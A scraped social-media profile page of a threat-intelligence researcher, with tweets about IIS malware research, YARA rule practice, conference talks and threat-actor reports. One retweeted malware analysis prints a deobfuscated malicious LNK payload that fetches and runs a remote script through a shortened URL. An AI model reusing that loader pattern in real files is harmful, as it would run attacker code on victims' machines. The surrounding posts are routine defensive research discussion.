John

604 posts

John

John

@BitsOfBinary

#threatintel @PwC_UK. Reverse engineering, threat intelligence, YARA. Amateur jazz pianist. All tweets are my own. He/him.

Katılım Ekim 2017
395 Takip Edilen1.8K Takipçiler
Sabitlenmiş Tweet
John
John@BitsOfBinary·
I've released a short blog on IIS malware: pwc.com/gx/en/issues/c… In it, I give an overview of some IIS malware research that has been done already, present a case study into a custom backdoor I found earlier in the year, and release some tooling to help analyse IIS modules!
English
1
39
90
14.5K
John
John@BitsOfBinary·
@Myrtus0x0 You on your first call back at work (congrats on finishing in top 10!!!)
John tweet media
English
1
0
4
366
Myrtus
Myrtus@Myrtus0x0·
Happy to be done 😤ended up taking time off of work to focus 100% on flare. Was absolutely brutal to say the least, my last solve was at almost 5am before needing to be in a meeting at 7 🥲 future #flareon11's are gonna be a lot more chill, ill tell ya that 😅
Myrtus tweet media
English
24
8
144
8.6K
John
John@BitsOfBinary·
Following recent reporting by The Citizen Lab and AccessNow on #COLDWASTREL (which we track as White Dev 185), we've put out a blog detailing some further infrastructure of the threat actor, and historic connections to other threat actors: pwc.com/gx/en/issues/c…
English
0
13
43
3.6K
John
John@BitsOfBinary·
Nice research from Check Point. I've blogged about the SessionsIIS backdoor last year, which they mention in their research: pwc.com/gx/en/issues/c… Timely research as well, as I'll also be mentioning these backdoors at @labscon_io next week.
Cyber_OSINT@Cyber_O51NT

Check Point Research has uncovered a new malware campaign targeting various Iraqi entities, including government networks. The campaign, employing a custom toolset and infrastructure, bears similarities to APT34, an Iranian MOIS-affiliated group. The mal… ift.tt/fW3oQUd

English
0
4
26
2.3K
John
John@BitsOfBinary·
@greglesnewich @labscon_io Thanks man, it'll be a beautiful day when our paths finally cross at one of these conferences 🤝
English
1
0
3
89
John retweetledi
Adam
Adam@malworms·
For anyone using Binary Ninja and wanting to use Mandiant's ShellcodeHashes IDA plugin-I ported a basic version of the IDA plugin to Binary Ninja: github.com/PwCUK-CTO/Bina… Known limitations - No GUI, no support for searching memory constants - but it works well for most use cases
English
0
10
25
2.2K
J⩜⃝mie Williams
J⩜⃝mie Williams@jamieantisocial·
today is my last day at MITRE 🥹 but this tweet is 🅽🅾🆃 about me...you should go follow @casey_knerr 🚨🚨🚨 She has been leading @MITREattack for ☁️ & now all of Enterprise. Casey is an all around AWESOME human 👑🪁
English
49
17
277
30.5K
John
John@BitsOfBinary·
@KevinPerlow It's been a while! Thank you for posting again 😁
English
0
0
1
162
Kevin Perlow
Kevin Perlow@KevinPerlow·
Some North Korean post infection malware. Nothing groundbreaking, I just always like to see the actual code when vendors gloss over it: norfolkinfosec.com/north-koreas-p… I’ve included hashes where the files were on VT, if you want to grab them to look for yourself.
Kevin Perlow tweet mediaKevin Perlow tweet media
English
1
7
16
1.8K
Germán Fernández
Germán Fernández@1ZRR4H·
▪ Interesting, "document.doc.lnk": 1058fe85419ee7dce9a30f9c31804d854c6749a6f4589fb1238d66ef9694346e Deobfuscated .LNK code: JaVAsCrIpT: fpNRzOcT1EQkD2UtK5LA6Bdoa0IWvjXixM9qGg = "moveTo(4008,4260);try{GetObject('script:https://goo[.]gl/nEenP8').hiiO()}catch(e){}close()" this.eval(fpNRzOcT1EQkD2UtK5LA6Bdoa0IWvjXixM9qGg) Next stage on #Slack: https://files-origin.slack[.]com/files-pri/TCVARGJTF-FCV2JNMDZ/download/f763b5c8?pub_secret=c98a7dd98a (not found now) 🧐 Other filenames: - Bolsonaro_Haddad.mp4.lnk - Comprovante.doc.lnk H/T @malwrhunterteam
Germán Fernández tweet mediaGermán Fernández tweet media
English
3
28
119
28.7K
John
John@BitsOfBinary·
@jstrosch Be careful handling LNK files! Even if you change the file extension, trying to do something like "Editing with Notepad++" will resolve the LNK to the target executable. Usually this is fine as it might just open "cmd.exe", but I'm extra careful handling them as a result.
English
0
0
3
94
John retweetledi
Thomas Roccia 🤘
Thomas Roccia 🤘@fr0gger_·
Analyzing data leaks is a very interesting Intel challenge, especially when you’re dealing with a foreign language 🤓 The I-SOON leak, which contains mostly PNG files of screenshots of documents, is a good example 🔎 Last night, I created a Notebook to automatically process and analyze the data to speed up your investigation. Here is my process 👇 🧵 If you don't want to read the thread, you can directly jump to the notebook here: jupyter.securitybreak.io/ISOON_DataLeak… #infosec #isoon #leak #threatintel #llm #python #jupyter
Thomas Roccia 🤘 tweet media
English
22
206
768
164.5K
John
John@BitsOfBinary·
Invaluable advice right here. The more YARA rules I write, the more I prefer having shorter, less complex ones. That doesn't mean you can't have a complicated condition or set of strings, but imo it's a good idea to have one "idea" per rule, where possible
Steve YARA Synapse Miller@stvemillertime

Break your ideas into pieces: do one rule for the pdb path, another rule for the imphash, a third rule for rich header hash, a fourth for file type + cool strings. This approach will help you measure the prevalence of the values and generally keep you from overfitting your logic.

English
0
0
10
841
Florian Roth ⚡️
Florian Roth ⚡️@cyb3rops·
Q: do you guys test your YARA rules before you publish them? I mean - at least on a small goodware set? #100DaysofYARA (cause I see even well-known vendors release rules that trigger thousands of FPs - we call them crap rules here; don’t know how you call them)
English
15
3
31
13.9K
John
John@BitsOfBinary·
@ex_raritas Sounds like the opposite of a broken rule 😎
English
0
0
2
86
John
John@BitsOfBinary·
@stvemillertime I can't wait to see you make rules that write rules that write rules. Or the ultimate challenge: write a YARA rule that can create all other YARA rules. The "YARA rule of everything".
English
1
0
4
224
Steve YARA Synapse Miller
Steve YARA Synapse Miller@stvemillertime·
You *could* use a YARA rule to create more YARA rules. Say you like a feature extracted by a YARA module, you can craft a YARA rule that will by itself parse that feature and print out a precise rule for it. Play with it, maybe it could be fun. github.com/stvemillertime…
Steve YARA Synapse Miller tweet mediaSteve YARA Synapse Miller tweet media
English
5
16
74
9.1K
Greg Lesnewich
Greg Lesnewich@greglesnewich·
big time #100DaysofYARA collab after triaging the BlackWood samples that ESET found, @stvemillertime shared some rules that hit, including a loose hunt for VirtualAlloc making RWX allocs @captainGeech42 came over the top and added the tasty func.rva to make it extra precise
Greg Lesnewich tweet media
English
3
5
30
4.5K